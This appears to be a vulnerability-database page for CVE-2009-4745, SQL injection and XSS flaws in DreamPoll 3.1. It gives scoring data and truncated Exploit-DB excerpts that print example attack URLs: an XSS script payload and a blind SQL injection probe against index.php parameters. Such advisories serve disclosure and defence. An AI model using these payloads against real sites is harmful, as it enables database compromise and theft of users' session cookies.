CVE-2009-4745
published 2010-03-26CVE-2009-4745: Multiple SQL injection vulnerabilities in index.php in Dreamlevels DreamPoll 3.1 allow remote attackers to execute arbitrary SQL commands via the (1)…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.91%
55.4th percentile
Multiple SQL injection vulnerabilities in index.php in Dreamlevels DreamPoll 3.1 allow remote attackers to execute arbitrary SQL commands via the (1) sortField, (2) sortDesc, or (3) pageNumber parameter in a login action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dreamlevels | dreampoll | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Dream Poll 3.1 - '/index.php' Cross-Site Scripting / SQL Injection
exploitdb·2009-10-13
CVE-2009-4745 Dream Poll 3.1 - '/index.php' Cross-Site Scripting / SQL Injection
Dream Poll 3.1 - '/index.php' Cross-Site Scripting / SQL Injection
---
source: https://www.securityfocus.com/bid/36663/info
Dream Poll is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Dream Poll 3.1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?action=loginsortField=poll_default&sortDesc=1&recordsPerPage=1>?>alert(911)%3B
http://www.example.com/index.php?action=loginsortField=poll_default+and+31337-31337=0&sortDesc=1&recordsPerPage=20
http://www.example.com/index.php?action=loginsortField=poll_d
Exploit-DB
DreamPoll 3.1 - SQL Injection
exploitdb·2009-10-08
CVE-2009-4746 DreamPoll 3.1 - SQL Injection
DreamPoll 3.1 - SQL Injection
---
During a recent security audit of the DreamPoll 3.1 software by Dreamlevels, I discovered a number of XSS and SQL Injection vulnerabilities in the application. These vulnerabilities could be exploited to make unauthorized changes to a web site or compromise a client accessing a site that utilizes the application. Details of the vulnerabilities are as follows:
XSS
????????-
File: index.php
Variable: recordsPerPage
Example: GET /index.php?action=loginsortField=poll_default&sortDesc=1&recordsPerPage=
1>?>alert(911)%3B
Blind SQL/Xpath Injection
????????-
File: index.php
Variable: sortField
Example: GET /index.php?action=loginsortField=poll_default+and+31337-31337=0&sortDesc
=1&recordsPerPage=20
Blind SQL Injection (Timing)
????????-
File: index.
No writeups or analysis indexed.
2010-03-26
Published